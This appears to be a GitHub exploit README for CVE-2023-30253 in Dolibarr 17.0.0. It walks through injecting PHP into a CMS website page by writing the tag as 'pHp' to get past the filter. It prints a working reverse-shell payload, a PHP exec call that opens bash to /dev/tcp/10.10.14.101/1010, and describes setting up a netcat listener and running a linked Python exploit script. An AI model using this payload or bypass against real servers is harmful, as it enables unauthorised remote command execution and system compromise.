/Dolibarr-17.0.0-Exploit-CVE-2023-30253

In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.

Primary LanguagePython

Readme.md

CVE-2023-30253

CVE-2023-30253 is a security flaw in Dolibarr software that enables authenticated users to execute remote code by utilizing an uppercase manipulation technique in injected data.

Impact

This vulnerability can lead to unauthorized remote code execution by malicious actors, posing a severe threat to the security and integrity of the affected systems. The vulnerability has been fixed in Dolibarr 17.0.1.

Reference

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


Proof of Concept

Following POC shows how to get Reverse Shell manually.

Untitled.png

After login as test user, we can create/modify website.

Untitled (1).png

First create a website, and then create a page.

Untitled (2).png

Untitled

After creating website and page, click on binoculars icon, this will open our created page in new tab.

Now click on Edit HTML Source.

Untitled (4).png

Here we can try adding php code, but there is some kind of filter preventing us to write a php code. This can be easily bypassed by changing the format of word php.

Untitled (5).png

After changing format of word php to pHp, we can see it is successfully saved.

Untitled (6).png

Going to the page, we can see our inserted php code is working.

Now to get reverse shell, lets set up netcat listener

Untitled (7).png

Untitled (8).png

Then add our reverse shell code <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

Now opening the website, gives us reverse shell

Untitled (9).png




We can use the python code to make it easier

Untitled

Setup netcat listener.

Untitled

Run the script and we should have a revershell.

Untitled Author of the script: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253